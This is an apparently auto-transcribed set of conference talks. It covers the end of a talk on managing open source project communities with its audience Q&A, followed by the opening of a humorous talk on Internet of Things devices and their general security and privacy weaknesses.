in time and it needs a decent client. It's rather durable because you can search the logs, but trust me, it's hard to follow in retrospect. It's web for low bandwidth, text only, cheap to set up. Suddenly it's asynchronous. Somebody can post a question. Somebody can post the answer once they are online and there's no need for them to coordinate. It's pretty durable. You can search these discussions. You can follow archive discussions. It's pretty nice. Mailing lists are similar. Text only. You can use the issue tracker. It's nice because it's low bandwidth, asynchronous, durable. It's well structured, but it's really fine-grained. If you look at the bug tracker of Elasticsearch Core, you will have a hard time figuring out what the strategy is except you know exactly how this bug tracker is being used by the project. For higher level views, you can use Wiki pages. Sometimes structured. You can go for web pages which hopefully are really well structured, which leads you through everything you want, which have documentation, which have a high level view. I want to tell you use the right communication medium for the task at hand. You will have to use all of them. If you have a burning conflict where people are fighting each other, get someone on a video chat to talk to each other. Sometimes it goes both ways and it's fine. Sometimes it's just like, okay, technology failed us. We misinterpreted. There was a misinterpretation of states. When I call my husband and O2 tells me that his line is busy, and it's not actually busy, but he's just clicking me away because he's in the meetings. We talked in an hour and we figured out O2 was a culprit. Everything is fine. No need to communicate through the broken channel anymore. What you do want is one canonical place for keeping current status. Where do you go to figure out if a build failure is fixed already? Is that on the mailing list? Is that in the issue tracker? Is that somewhere else? Have it in one place. You want one canonical place for documentation. No separation there. You want one canonical place for tracking previous decisions. The long-term memory is provided through mailing lists mainly. It can be different at different projects, but have one place where people can go. If you pull more and more people in, you suddenly will think about mental health and you will think about over commitment. One thing to avoid, avoid the cookie effect, jumping on every task. I'm going to do it. Five months later, it's still sitting there. There's a couple dozen people who could have done it, but didn't do it because you jumped on it. Leave it there. Leave it sitting if you don't do it immediately. Maybe someone follows up. Avoid getting too much on your plate. At some point, you will need to tell people, my pipeline is full. Patches welcome. Please help me out. Ask for help. There's a few nice pages, especially at Apache on remaining sane and not over committing. You will also have to think about physical health. If you're sitting at your laptop for hours and hours and hours, there's a good chance that your hands will be very angry with you. There's a good chance that your neck will be angry with you. I've got a better time carrying my 11 kilogram child all day than sitting in front of my laptop all day. Neck is worse when I'm sitting in front of my laptop all day because I'm huddled together. There's a great keynote at Berlin Bus Words two years ago by Eric Evans on ergonomics and what pain he went through by not following this advice. If you don't believe my words, watch this keynote, probably you will believe in. You will also need to think about project growth. As soon as you have several projects, several people working on your project full time for newcomers that will feel like drinking from the firehouse because they are contributing eight hours a day to your project, multiple people. So you will need to find a way if you want to have a diverse community to enable those who don't have that time who are probably doing it after work or just as a site project at work to follow up with what's going on. You will also need to deal with poisonous people who try to destroy the culture of your project by trolling or by asking the same questions over and over and being very persistent. So you will need to figure out strategies to identify these people together, together data about what's happening and how much energy is actually draining from your project and to kick them out if worst comes to worst. There's a few talks, one by Ben Collins-Sussman and one by Brian Fitzpatrick on dealing with poisonous people. There is a great YouTube recording on talks that Kristin Koentop gave at this very conference a few years ago on how it dealt with flameworks and breaking communications. There's also a nice presentation on the Rust community online that talks about how publishing acceptable and unacceptable behavior together with the countermeasures that are going to be taken if you break this contract can help build a friendly community and can help keep people out that you do not want because one thing to keep in mind is no matter which rules you set up, even if you don't set up any rules, you will always exclude some people. And somehow some culture will evolve. My advice would be to build this culture consciously, to read strategies on how to build the culture, some cultures that you want to see. Some culture will evolve, it may not be the one that you want. Finally, change management. What's the biggest change in an open source project? Leader leaves. Nobody is there anymore. Prepare your exit well in advance. Me personally, I did Berlin Buzzwords first time in 2010 with no intention of running this event more than once. Fortunately, we had attendees who wanted to come back. So now I was left with a conference that depended on me doing all the marketing, all the outreach, all the sponsorship. Fortunately, not doing all the accounting, that's what I had a producer for, but I still had to do the talk selection together with a few other open source contributors who helped me with this conference, one being Simon Wilner, the other one being Leon Lainard. But suddenly we had to find a way to make this conference stand on its own feet. Me personally, it took, for me personally, it took four years to get rid of this conference without breaking it. So build this handover in from the beginning, document from the very beginning, and delegate from the beginning, and find a way to build a memory into the project you do. So it's really mostly about delegation. And was that, it's time for me to wrap up and to start the discussion because I want your feedback and I want your questions. If you have any questions, I have the microphone. Well, come on. So what I'd like to ask you is, especially in the, if you set up a project and if you don't have the right communication culture, are there any hints you could give us to improve on that? The first one, so about improving culture is the first one, lead by example, you should be the commuter that you want to meet coming to the project. Well the other ones, there are tools out there, one book by Peter Higgins on building successful open source communities. There's one on building successful online communities that you can read where there's actual tools like gamification tools, being transparent, etc. that help you do that. There's quite a bit of literature that can help you. One thing that I find helps is to lead by example. This helps very much. The other one is if there is like root behavior to keep the discussion technical, but to call out people on their root behavior and then lead the discussion back to a technical topic. What also helps if you keep, like sometimes you read an email and you're really upset about it. What helps is to take a breath, walk away from the keyboard, come back and reply to this email in sort of like a professional context, with keeping most of this anger out and keeping all of the ranting out. What you need for that is like a distance between you and the email you are just answering. One hint for the first three questions. You should go to the elastic search booth. There's a surprise waiting for you. Okay, I'm lucky then I think. I wanted to ask what did work for you best for event management from the infrastructure side. I've been organizing events myself and I've been struggling finding an open source solution to gather all the details for a conference for example. What do you mean infrastructure for accounting for managing speakers? Yeah, for managing speakers, websites. I do have an event producer I don't like the systems they are using. The one that I like from a speaker's perspective is the one that Frostcon is using and that is FRAB. There's also a talk I think today, I don't know about what tools Frostcon is using. If you don't make it to this talk, check the schedules, there will be a recording of it and they will talk at great lengths. I'm interested because I'm a mentor at Google Summer Code and we are doing an open event tool and we want to improve and maybe work also on that. Thank you. Over there. Hello. Thank you very much for the inspiring talk. I was just wondering this is now a very long list of very big words and if in the beginning you are just one coder with one idea, where do you start? I feel a little bit overwhelmed. Do you take a depth first approach where you say, okay, I do the code and then I spread out or do you go breath first before I code anything? I start building up all the departments? It depends on your preference. The way I started with Apache My Out was that I tried to find, so my goal was to build something not necessarily to build a business around, but to build something that would be bigger than me. The first step I did was to find people that are like-minded, that want to do the same thing. What we together then did was to figure out if there's a project already there that covers our use case. Unfortunately, there wasn't. The third thing then was, okay, we decided on a license, we decided on hosting and then we go coding. We never forget about getting new people in. It really depends on your goal. I think there was another question. Yes. First, thank you very much for the talk. Very interesting. Second, I was wondering if you know any studies, because you spoke about that it's very important to answer quickly, to contribute, otherwise they might get lost and that makes a lot of sense. But I'm wondering if you know any numbering around how many contributions might be lost if you know any open source projects. No clear numbers. No clear numbers. Sorry? No numbers. Okay. It's interesting. It will be an interesting study. We work at the same company. You can go to ElasticsearchCore. Check our GitHub issues and see how old they are. I'm actually thinking to do it. Go ahead. So we have one more giveaway because he's working for the same company, the same gimmicks. Sorry. One more question. Come on. It's like Rubik's Cube. There's power chargers. So I'm not talking about pens. Yeah. Here you are. One thing I didn't hear you talk about is when one's thinking about coding, one often tries to make the number of differences in approach to a project as small as possible from established practice. It seems to me there are big advantages doing the same thing on the non-coding side, especially if, for example, you talked about walking people through the committing process. There will be a lot of people who are familiar with committing to other open source projects and presumably there's quite a lot of mileage in making your process only different when it's really important to your project. I suppose I was wondering really whether you have anything to say about resources for, I suppose, turnkeying that in the same way as you can turnkey quite a lot of the technical, cyber technical infrastructure for a project. So the reason why Apache Mount is Java is because at the time when we created this project, there was a huge amount of Java developers. So we knew that there's just a tiny fraction of people who know about machine learning and going for some exotic programming language would even further reduce the communities that we can draw from. So that's why we decided for Java. The reason to go for Maven slash aren't was because it was a well-known well-established build system. So that people who get started know how to get started. You may hate Maven as much as you want. If you want to make it easy for Java devs to contribute, make your project follows the Maven structure so they know where the source code is lying, so they know instantly how to get stuff into the RAD without reading documentation. Any additional hurdle makes it even harder for people to get started. That's very, very true. So those are all technical choices about the project. I was really wondering the same thing, maybe more with processes on the non-coding side, so making it as easy for people to apply their knowledge from other projects on the non-coding side as it is on the coding side in the way you're talking about using skills that are common technical skills. So for some of the topics I've been talking about, you don't see a lot of commonalities between projects. I only have experience with the ASF and within the last six years, so it may well be that similar processes exist within the devian community, federal community, and what have you. I can't talk about that because this is apparently not my background. What I found helpful when getting started with projects is to write down some of these processes. When I started at Apache Nothing, I didn't find the documentation. Try Googling for Apache Jenkins. What you find is the documentation, how to set up Jenkins behind Apache. You don't find the Jenkins of the Apache Software Foundation. Not helpful. So you need some good documentation on how things work. It does help to look across boundaries. If you are within the ASF, it does help to have some insight into other communities. What I realized from my own background is that this kind of looking behind the scenes is pretty timely consuming. So I've got some insight into the Linnos-Kirlo community by virtue of having a husband who is into this community. I've got some insight into the FSFE just because they are also in Berlin and I know some of these people. This is how it works, but it's time consuming. I know few people who have experience with communities like crossing boundaries and comparing things and how things work. That's definitely something that I would find interesting. Okay. No more gimmicks. It doesn't mean no more questions. But you can talk to me afterwards. So you will be around on your booth for the remaining of the day? I have a booth, children's room here. So I've got a little giggling with me and I've got my husband with me. If you see a little girl about, who's eight? With a pitchy-patchy pingoing, I'm probably not far away. All right. Then once again, thanks for your insights and project management for the Source Project. Thank you very much.
|
Your project's code base is rock solid, you are rolling releases early and often, your test suite is comprehensive and running regularly, your code is well performing without any glitches. Everything is in place that defines a successful open source project - or isn't it? This talk tries to highlight some of the key questions software developers will quickly be faced with when dealing with open source: In addition to coding skills, topics like people management, naming, trademark enforcement, licensing, patents, pr and more become topics to deal with.
|
10.5446/32437 (DOI)
|
So I guess we'll go ahead and get started here. And we're going to start all the way back at the beginning with the ENIAC. And this was not exactly an Internet of Thing. It was just a thing at the time, because it was the first general purpose computing device. And as you can see, it was huge. It was big. I mean, Phil, the entire room took like two or three people to actually program it and ran at the whopping speed of zero point very negligible megahertz. And these were great. This is a device that actually defined every computing device that has come since it. And even 20 years later after the ENIAC, this is five megabytes of storage. And they're loading this onto a large cargo jet at the time. Actually, I'm sorry, it's not even a cargo jet. It's just a large cargo airplane. That's five megabytes of data. How many people, when you snap a picture, generate more than five megabytes of data? The entire room should be raising their hand. So you can't even fit something that your cell phone camera is generating onto one of these. I mean, every time I snap a picture out of one of my real camera, it's like 26 megs. I would need five or six of these things just to store the bloody image. And this is the Internet. Quite literally in March of 1977, you can draw the entire Internet on a piece of paper. And so this is 20 years even after the picture I just showed you. And it's not very big, but everybody understood it at that point. And everything that is on that, I mean, this is literally the dawn of Internet of Things. This is good old ARPANET. This is the prelude to all of the Internet. And this is where we work. This is what has started the fundamental creation of Internet of Things. And this is where we are today. We've got cell phones that have more computational capacity than every computer that existed until the late 1980s. And that's in your pocket, let alone just the GPU itself to make the little animations in Pokemon Go, dance around, and you throw Pokemon balls at them. It's mind-boggling how much power is in a cell phone these days. Storage. So I showed you a picture of five megabytes. The smallest chunk of storage, removable storage, that you can get your hands on easily these days is 200 gigabytes and a microSD card form factor. That's something that's half, or a third the size of a postage stamp that's holding 200 gigabytes of storage. And the Internet has grown just a little bit. This is an attempt to map the Internet in 2011. It's gotten bigger since then. And the problem is, is that this is all technology that was there five minutes ago. Everything is changing so rapidly these days that even trying to describe what is currently out there is outdated. Because storage, when I double checked this earlier today, 200 gigabytes of storage may have been the maximum you could have bought. Within the last five minutes, although it is a Saturday, somebody could have announced an even bigger chunk of storage. The Internet has grown so astronomically since 2011 in comparison to that picture that it can't even really be displayed. I mean, there are so many nodes now on the Internet, particularly with the advent of IPv6, that it's hard to even fathom the number of devices that are getting connected to the Internet and the number of cell phones that are out there. I mean, how many people have a drawer full of cell phones that they've just thrown away because they still have data on them and they don't want to do anything with it? I'm sure everybody in this room has a drawer full of them somewhere. I know I do. I think I've got two now, actually. But that's where we're at right now. Kind of. But this is where we're headed because, really, this is the IoT bus. And we want to know what's coming, what's around the corner, why is this all being done, and what's all broken with it, and what can we do about that? And that's the interesting part here. So an oven. An oven is a really simple device. You plug it in to either a gas line or an electrical main. You turn it on and it makes things hot. And you turn it off before your house burns down. This is a really great idea. So what's the one thing we should do that? Let's hook it up to the Internet. Because that's a great idea. Because then I can turn it on and off remotely with my phone because that's not a bad idea at all. Coffee maker. Because the first thing you do when you get up in the morning is you pull your phone out and you're like, I want coffee. Honestly, I can't actually see anybody doing that. I'm not sure that the phone works before the coffee's been had. So you've got kind of a chicken and egg problem. I need to turn the coffee maker on. But I... Crock-Pots. Again, a device that makes things get hot controlled by your cell phone. And kind of venturing off. I mean, IoT really is pervading everything. So I've talked about three little kitchen gadgets. This response in the last six months, I believe, came out with a Bluetooth-enabled pregnancy tester. This is an honest to God. Honest to God. It's a $20 pregnancy tester. This is literally throw away Bluetooth low-energy device. It's a one-time use. And if the device finds that you're pregnant, it actually pops up all this information on your cell phone, giving you offers for diapers and where to go and do all these kinds of things. I mean, it's an absolutely brilliant and horrible idea at the same time. And I would love to have been in one of the marketing meetings where somebody goes, so we want to add a Bluetooth low-energy device with a microcontroller to this whole thing. Because the amount of technology that is required to get from... To read out even the data off of the test strip is astronomically amazing. I mean, this is modern medical science where technology is actually capable of doing on the spot reading of information and then sending it to your cell phone to send you coupons. And of course, with this being Internet of Things, it connects to the cloud and it reports back to first response on a bunch of different things. And there's another device that I'm not including in here for some very specific reasons. If you're very curious, go and take a look at some of the talks from DEF CON this year. It's another very personal device that was found to be... While it was being used, was actually reporting data back to the parent company. This is incredibly private information. It's being reported back up to the company. And these things exist. We've got... Continuing in the medical line, we've got peacemakers. How many people want something that's connected directly to your heart being controllable via Bluetooth? That's a great idea, right? How's the security on Bluetooth? Anybody want to give me their Bluetooth password? Really? Takeers? And okay, you've got medical devices, but home locks. Out of curiosity, how many people have a digital lock on their houses at home? Anybody? One. Z-Wave? No? I don't manage it. Oh. So is that the Internet of Parents? But I mean, technology is now literally opening doors for us. You walk up. Oh, the power's out. I can't open... Oh. And in the same vein as door locks, we've got power outlets. These devices that connect in between like your refrigerator and your wall outlet. And what's the worst possible thing that could go wrong with a power outlet being connected to the Internet? I won't actually answer that question because it's really, really horrible. Oh, okay. The worst thing that could possibly happen is you hook this thing up to your refrigerator. You see that button on the front? Because this actually happened to me. Somebody bumps the refrigerator, turns it off. At which point you're like, huh, why doesn't that work? You figure out what's going on, you turn it back on, and then somebody bumps the fridge again. And the whole thing turns off. At which point this part didn't happen. You get botulism poisoning because everything in the refrigerator goes bad. And you die. And speaking of refrigerators, the Internet-connected refrigerator. How many people have ever even seen an Internet-connected refrigerator? How many people want an Internet-connected refrigerator? Honestly. Okay, one. Okay. Why do you want it? It's a nice phone? Oh, a nice toy. I'm sure that people... There's a lot of other people who thought it was a very nice toy too. A few years ago, every Internet-connected fridge in the world was used as a spam relay. That's a really nice toy. But yeah, I mean, it'll display your calendar. It'll tell you when the next soccer game is, and it will tell you exactly what that little blue pill that we all desperately...or so desperately need is and where we can buy it on the Internet because it's totally not fake if it's on the Internet. And this is just the default security permissions because there was a web browser and people would go browse the Internet from the refrigerator. Doorbells. You push the doorbell, it lets you know who's there, and this is kind of like the door locks. And TVs. Oh, TVs. How many people have a smart TV? I'm sorry. How many of those have cameras on them? Anybody? One. One brave soul who's going to admit that he's probably been infected with a virus on his TV and is streaming himself sitting on the couch watching TV to everybody. Oh, you've got a sticker on it. Oh, you are better than most people. So I'm going to digress on the TVs a little bit because this is going to be kind of a digression for everything here. Internet-connected things are scary. They're really, really scary because once they're connected to the Internet, they have a tendency for a variety of reasons to want to dial back home somewhere or give you access to, well, the Internet. I mean, this is kind of the Internet of things. And the Internet is a really dangerous place. It is a surprisingly dangerous place. And there are people setting up spam relays on refrigerators. And there's a lot of new evidence that's coming out about smart locks being trivially openable from the Internet, ovens and crockpots accidentally burning things down. I mean, this is one of the things that we've got to really start thinking about as we build these devices because IoT isn't going away and it's going to get more pervasive. Like thermostats. How many people have heard about the recent issue with, I believe it's the Nest, I think it was specifically the Nest, just completely winging out and turning off heat in the middle of winter? Because a couple of people have heard about this. If you haven't, it's actually a really interesting article. Don't look it up. But the short answer is there was a software bug and it just turned off heat in thousands of homes in the middle of winter. Because that won't lead to burst pipes and people freezing to death and pets freezing because they were left in a house that they believed was going to be heated. I mean, there's definitely some interesting aspects to that, or to all of that. And again, so we've just talked about thermostats, which aren't that dangerous. Let's talk about a smoke detector that's connected to the Internet. What could possibly go wrong? I mean, everybody's been woken up by that. I swear it's 3 AM every single time this happens. It's 3 AM and the battery alarm starts going off on your smoke detector, right? So what happens if somebody can just trigger that all the time? Like every 20 minutes? Or silently not tell you when there's actually a fire or carbon monoxide or something? And thermostats, I mean, not even thermostats, but thermometers connected to the Internet. This one, in fact, you plug into your phone. You can see the headphone jack on the left there. You plug it in, you get your temperature. And why does this need to be connected to a cell phone? Do I really need to upload my temperature being 98 points, something or other, in the magical Fahrenheit system that apparently is magical and nobody understands over here? Sorry, I'm from America. I'm sorry, America. Oh, what happens when you plug the other side? I don't know, actually. I would not recommend trying... Oh, you can take the temperature of your smartphone. Maybe. I don't think it'll work that way, though. I think you'll just short something out and everything will explode, which, like, you know, gets hot at that point. God, I love these slides for no other reason than I get to just joke about random products that exist. Okay. And the device that everybody will recognize. This is one of the greatest IoT devices in the world. The Linksys WRT54GL. You know how many things the WRT54GL has been plugged into and hooked up to and made do things? Everything! You know, thermostats, thermometers, Roombas. You've never seen a WRT54GL running around on a Roomba, usually with a knife. It's an amazing thing. Go look for the videos on YouTube. I wish I could actually show them, but I didn't think to add that. But these are one of the most... I mean, the WRT54GL is just indicative of a device that everybody has. And you know, everybody in this room probably understands how it works. How many people know how a network works, actually? Okay. Yeah. Three quarters of the audience raised their hand. How many people think that everybody else in the world understands how this works? No one? No one's going to take that. Oh, yeah. And I put this up here for a very specific reason. I've got a few more devices I'm going to show in a minute. But every one of these devices wants to be on the Internet. But nobody knows how to configure that, except for about the three quarters of the people in this room. Which none of you get hit by a bus because the world would lose a great many people. So all of these devices figure out really neat ways to dial back home. Usually by setting up a reverse proxy. They dial back out and then they connect to some magical central server so that your cell phone, when you're standing here in Germany, can talk to your device that's sitting in Portland, Oregon. Because not doing that over a VPN, well, one, VPNs are hard. Nobody can set it up on that, except for the three quarters of the people in this room. And two, well, it's just usability issues. Most normal users, they don't understand their networks very well. And some of that's our own fault for making networks hard. And some of that's just because networks are hard. And companies want to make... Everybody wants to be able to control their thermostat from their phone. They want to be able to control their IP... Look at their IP cameras or the random outlets or their coffee maker, assuming they're not first thing in the morning. And they want to be able to check, oh, did I leave the stove on? How many people would have loved to have had a, did I leave the stove on an app for their phone when they're going away? Yeah, a couple of people. I mean, the convenience factor for a lot of these devices really is there. The internet is actually bringing something to these devices that didn't exist before and is really important and really powerful, except for the coffee maker. I still... Again, don't understand. The smart outlets, I mean, a lot of these smart outlets even include devices to monitor energy usage. And if they reach some magical level, they'll turn things off. I mean, I know people who are hooking these up to soldering irons to prevent themselves from accidentally burning down their shops and their labs. I know people who are hooking them up to all kinds of different things for either safety purposes or monitoring purposes. Or even just, oh, well, I'm not in that room, I'm just going to turn it off. Because everybody carries their cell phone around with them all the time, right? This is the most wonderfully trackable device in the universe. Constantly broadcasting Wi-Fi, constantly broadcasting cell signal, and for most people, constantly broadcasting Bluetooth low energy, or at least Bluetooth. If you had the right sensors around your house, you could pinpoint yourself within inches inside your house, and you could turn devices on magically as you wander from room to room. Because that's both a brilliant idea and one of the scariest things I could even remotely think of. And we've got Fitbit. How many people have a Fitbit? Is there only like three of us in the entire room? Wow. Okay. Maybe this is more an American thing, but almost everybody has one of these devices. The really neat thing is, is I could be an absolute jerk right now and run the sync program on my cell phone. And every Fitbit in this room will get synced to the cloud. And I've never seen you before in my life. And there was another gentleman over here, and I've never seen you before in my life. And yet my cell phone will pull data off of a device that you are carrying on you, filter all of that through it, which means that I also have all of your data. How awesome is that? Wait. Yeah. And I mean, and some of the Fitbits even have rudimentary ability to track kind of where you're at. And they're quite GPS accuracy, but they can kind of give you, you know, oh, well, you walked like this way. I mean, these are really complicated accelerometers. And you can do dead reckoning based on a really good accelerometer, which means that all of that data about where you've been, yeah, I have that now too. I mean, for all I know, you know, I could pull up this data and you could have been at McDonald's an hour ago. Probably weren't, but I'm sure you were in a talk. But you know, and you know, a lot of the Bluetooth low energy devices that are out there actually do this. They do no authentication. They just broadcast information, you know, specifically when the sync bit or the Fitbit system just queries, are you a Fitbit? I would like your data now. And it gives me all of the data and then I upload it to the cloud. Unless I'm a middle party and I just collect your data. Now, to be fair, all I'm getting is a unique ID in your stuff, generally your step count, which, yeah, okay, fine. But I've got your unique ID, which means now I can track you. And if I have a big enough network of devices that can speak Bluetooth low energy, I can follow you everywhere. And yeah, but these are, you know, really great devices. I mean, heck, I've got one on me. And one of the conference organizers alerted me to this earlier. I didn't even know about this thing. This is a Wi-Fi enabled pet feeder. So this will monitor when your pet eats, how much it eats, and then it will dispense based on various criteria that's built into it. And it's connected to the internet. And you know, think about this for a minute. Hi. Oh, you know, I'm out on vacation for a weekend and Fido ate, you know, some food. Great, let's feed him some more. But what happens when it doesn't feed Fido for like a week? Because you're not home. I'm just saying, I'm not advocating that by any stretch of the imagination. I think that's a horrible idea. And of course, from the keynote this morning, everybody plays Pokemon Go, right? Everybody's on the blue team, right? What? No, you're not on Pokemon Go. Would you like an invite? No, I guess this isn't ingressed like it used to be. But you know, we've now got games that are generating chunks of hardware to help you play the game. And I mean, this isn't like a controller. This is just like a watch. That you know, when you're wandering around and you get near a Pokemon that your phone then tells the watch that you're near a Pokemon and you press the buttons so you can catch it. That's all it does. It is literally a Bluetooth low energy button and a small vibrating motor. This is the Internet of Things. These are the things we are building right now. And these are the things that are actually, I mean, these are obviously all things that are making it to market. Because there are things like Kickstarter and Indiegogo and everybody with half an idea, either software or hardware, is putting these things out. And some of these are absolutely amazing. I don't want everybody to think that I'm throwing these up there to mock them. Well, I'm kind of mocking them. But some of these devices are genuinely amazing devices. I mean, the Fitbit has actually gotten more people to go and do exercise by gamifying exercise than I have seen in my entire life. I've never seen a device that's actually been successful at getting people to go and walk a hypothetical 10,000 steps. We can argue about the accuracy of the 10,000 steps later. And there's people who are taking and monitoring, even just the home... I'm going to completely blank on the word. Climate control systems. People are now actually monitoring and watching what their houses and their buildings do better. And they're making changes, either to save energy or to realize, oh, well, I really don't need the air conditioning on today. Let's just turn it off. Because all of these devices are absolutely... Because this is a brilliant plan and I'm glad to be a part of it. Really IOT devices are both brilliant and horrible all at the same time. There's really no way to get around this. I have IOT devices sitting in my house right now. I've got a bunch of IP-based cameras. IP-based cameras are all made in China, whether they claim they're not is irrelevant. They're all made in China. And they all phone home. I've turned off everything for these... Every magical checkbox I can find in the firmware and they're all still trying to phone home. And why do I know this? Because I just threw them all on a VLAN, firewalled the VLAN off so that it couldn't connect to the Internet and I watched all the attempted traffic fail. These are brand name cameras. They're all trying to phone home. They're all trying to tell the company that made them something. And I have no idea what it is. They're not supposed to be calling home and yet they are. I've got a Z-Wave controller, which if you're not familiar with Z-Wave, it's one of the low power home automation type control systems these days. But the entire device lives in my house, runs on my network, it's great, it's all self-contained except for one small piece. It connects to the Internet to do authentication. I can't authenticate to my local device without going to a cloud provider that the manufacturer provides, log into their website at which point it redirects me back to the unit in my house. What could possibly go wrong with that entire scheme? Oh, and by the way, you can't control anything unless you're authenticated. I've been having words of that in particular manufacturer over that for a while now. I don't think they like me. But there's one thing here and most everybody in this room really isn't going to find this particularly amazingly weird or different or even just odd. It just is. These are the things that are here to help us actually solve all these problems because these devices are all being manufactured. I mean, you've all got cell phones in here. How many of you have Android? How many of you have Marshmallow on your device? So all of the people who had their hands up, 80% of them lowered them for the people at home. How many of you have, was the one before Marshmallow? Lollipop, thank you. How many of you have Lollipop on your phone? Not many. Kit Kat? How many of you have no idea what version of Android is on your phone? What? Okay. How many of you have six, which is Marshmallow? How many of you have five X something, which is Kit Kat? Oh, Lollipop, sorry. Version numbers are hard. Really, can somebody go and talk to Ubuntu about their naming scheme because I don't understand it anymore? I mean, you start with Warty Warthog? I accept the homage paid to me, not that I think that they did, but now we're on a completely different letter of the alphabet. I don't... Hey. How many of you are on 4.something on Android since I was asking questions about Android? Three? If any of you are on two, please just give me your cell phone. I will give you a new one. Are you seriously on a two-something? Seriously, a Moto E right now is $29 US, and you can run Marshmallow on it. So what you're really saying is that you haven't gotten a security update in like four years, four or five years. Do you know how many kernel security vulnerabilities there have been since then? You connect to the Internet? Do you use the browser? How many people think that's a really bad idea? You're all right. I'm ragging on it for no other reason that I want to use it as a point here is that devices are now getting made, and all of those devices that I showed, they're all made by companies, and they all have one real big goal. Make the thing, get it out there so that you buy it, and then move on to the next one. Because support's really, really hard in the long run. Car companies, cell phone manufacturers, nobody... I mean, even computer manufacturers in the general sense don't want to support things for more than a very small amount of time, because it's all cost to them. And you're buying devices at the lowest possible cost already, which means that their margins just basically don't exist. And so their want to support these devices for a long period of time is basically zero. And this presents an obvious problem, because then you end up with cell phones that are running Android 2.something when we're on Android 6.something. I don't even know what the absolute latest is. But the number of things that have changed or been fixed or been found to be a problem in those four intervening versions, that's at least four years. I think it's more like five with two something. It's crazy talk. But yet, there are still people, unfortunately, running around for whatever reason. I have no idea what your reason for it is, other than it's probably a really nice phone and it probably has a real keyboard. Yeah. Yeah, the real... Oh, man, I miss real keyboards on cell phones. Yeah, my typing has not gotten better without the keyboard. Tempting, except then I'd be running a cell phone with two.something. But here's one of the biggest things that's going to help all of us. And this is not a surprise to any of us in this room. I mean, you're here at an open source convention or conference. We all get this. If everything was open source, we could at least go and fix it. Because at some point, we all want to just go and fix things. We want to make it better, we want to change things. But open source only works so much if you've got access to the underlying hardware. I mean, we've all got cell phones. How many of you can actually get even root on your cell phone that you believe you can get? That's a much smaller handful of the people who said that they had Android phones or any phone in general. I mean, it makes it really hard to get access to these things because, again, the companies don't want to open these protocols. They don't want to open up their hardware, except that that's one of the things that can save us from the impending mess that we're all looking at. Open source hardware. How many of you have even heard of open source hardware? Oh, good. Good. I like all of you people. I don't have to explain this. Open source hardware is just one of those things that it makes everything easier. It gives you a really great starting point to build your own devices from. And honestly, once a company stops wanting to support something, why wouldn't they want to make it open source hardware? Because then people are going to go off. They're going to use it. They're going to maintain it. Now, admittedly, that also means that you're not going to buy the latest and greatest widget that they put out. Oh, OK. And there's a couple of projects here that use open source software and hardware, specifically the Minnowboard Foundation, which I happen to be a member of, and Beagleboard, which is another open hardware platform. These are devices that are out there that people are taking and using in all kinds of different ways. And you've got companies that are making open source hardware and using open source software and putting everything out there so that people can build stuff, add a fruit and seed and spark fun. And in fact, the device that's up there, the red PCB, is actually a small microcontroller called the ESP8266. Want to guess what it's really great for? Internet of things. It's got a Wi-Fi chip built into it. Honest to God, it's got a full Wi-Fi stack, including access point mode. That entire board, at least in US dollars, was $14.99 when I looked at it yesterday. $14.99 for an entire module itself. Just the module itself, not in that specific breakout board. You can get the chip that runs all of that for $5. I mean, I'm sorry? And even less, if you go with the, this might not be an official ESP8266 from Alibaba. That's true, they do all come from China. And yeah, I'm not going to get into that. I'm not going to get into that. I'm sorry? Well, I mean, this gets back to, yeah, I was going to say, this gets back to the pregnancy test device. They doubled the cost of the pregnancy test from $10 to $20 to add the extra functionality. But this is why they can do that, is the hardware is so bloody cheap. We are literally living in a golden age of computational performance. Yeah, it only does IPv4. Nobody cares about that IPv6 thing except everybody that should care about it. But yeah, I mean, we are literally living in a golden age of computational performance and cost. I mean, if you go back to when computers first created the ENIAC, this is a computer that would have taken up probably more than this room in floor space. And the amount of power and cost to run it was just astronomical. And nowadays, we have more computational power in my watch. It's just a little Android smart watch. There's more computational power in that than existed in the ENIAC. In fact, there's probably more computational power in my Fitbit than existed in the ENIAC. And these are devices that we're buying for a pittance for their computational capacity. I mean, the ESP8266 is probably faster than the 386, you know, a lot of us grew up programming on. And yet, I can buy that for as little as $5. And I can stick it into pregnancy tests and literally throw it away because it is now so cheap. I mean, think about that for a minute. Computation, computational power has gotten so cheap, we can literally use it once and throw it away. I mean, how is this not defined as a golden age for everything we're doing? And one of the most frightening things I could ever say is we are, you know, we are at the point where computational capacity is that inexpensive. And here's why all of those things actually help. No, this doesn't work. Please don't try this at home. I believe you'll actually short something really badly. And for those of you too young to realize what this all is, that's a parallel port connected to a parallel port, no modem adapter that's connected to a serial, parallel to serial port adapter that's connected to a serial port to PS2 adapter that's connected to a PS2 to USB adapter that's connected to a USB flash drive. No, this really doesn't work. I'm not even sure that power flows properly through that. And I think the power that comes out of a parallel port is 12 volt. So that's really not going to end well for the flash drive. But you know, and the reason open source software and hardware is really going to change the, is not only changing the world as it is, because a lot of the devices that, you know, that are in the Internet of Things are coming out of, or at least vaguely related to the open, the open source hardware that exists, is because people are taking all of these devices and they're doing things differently than what the manufacturer actually intended. I mean, how many people honest to goodness believe that that Bluetooth low energy device that's in the pregnancy test was actually intended for a pregnancy test device? How many people would have even thought of that? I mean, it's absolutely brilliant. You know, let's take a Bluetooth low energy device and this and let's, yes. This is great. Then we'll give them coupons. Or the connected fridge, or the connected oven. I mean, how many of you have backed something on Kickstarter? Oh, come on. Don't lie. Just because it didn't show up at your house doesn't mean that you didn't back it. Okay, fine. But I mean, there's a lot of the, I mean, people are just coming up with ideas and these have all existed before. But things have gotten so cheap and so easy to do either because open hardware now exists and is making this more approachable, or making the hardware more approachable to software people or the hardware, or from the hardware perspective, the software is now more approachable because we've got open source software that's now pervasive in everywhere. But these are things that everybody's got, everybody's using. And they're going to take every piece of either software or hardware and they're going to use it in ways that we have never even imagined. How many people, I mean, we're all software people here, right? No hardware people in the audience, right? I know it's really gosh, I'm actually a software person that's turned into a hardware person so it's kind of weird to be talking at software conferences now. Because, you know, like, oh, I want to really talk to you about this weird transistor that I found and then everybody's like, what's a transistor? Where's my for loop? But how many people have seen their code used in ways that they would never have even thought of? One. No, that can't be it. Do you guys all, like, work on really boring things? I'm hearing a lot of yeses. I'm sorry, there's some really neat, I've got some really neat storage stuff that I'm working on if you want to come help. It's at least probably, well, actually it's storage, which means by definition it's boring. But I mean, go find it, I mean, even software is being used in ways that nobody even remotely thought of. I mean, some of the hardware boards that I've been making lately, it takes me 12 different programs to get an image to it actually showing up on a piece of hardware. You know, just like even an outline for a PCB. It takes me 12 programs. And I'm sure that, you know, 10 of those programs, actually probably 11 of those, never thought that they'd be used in PCB design. I mean, Inkscape, GIMP, Image Magic. How many of these sound 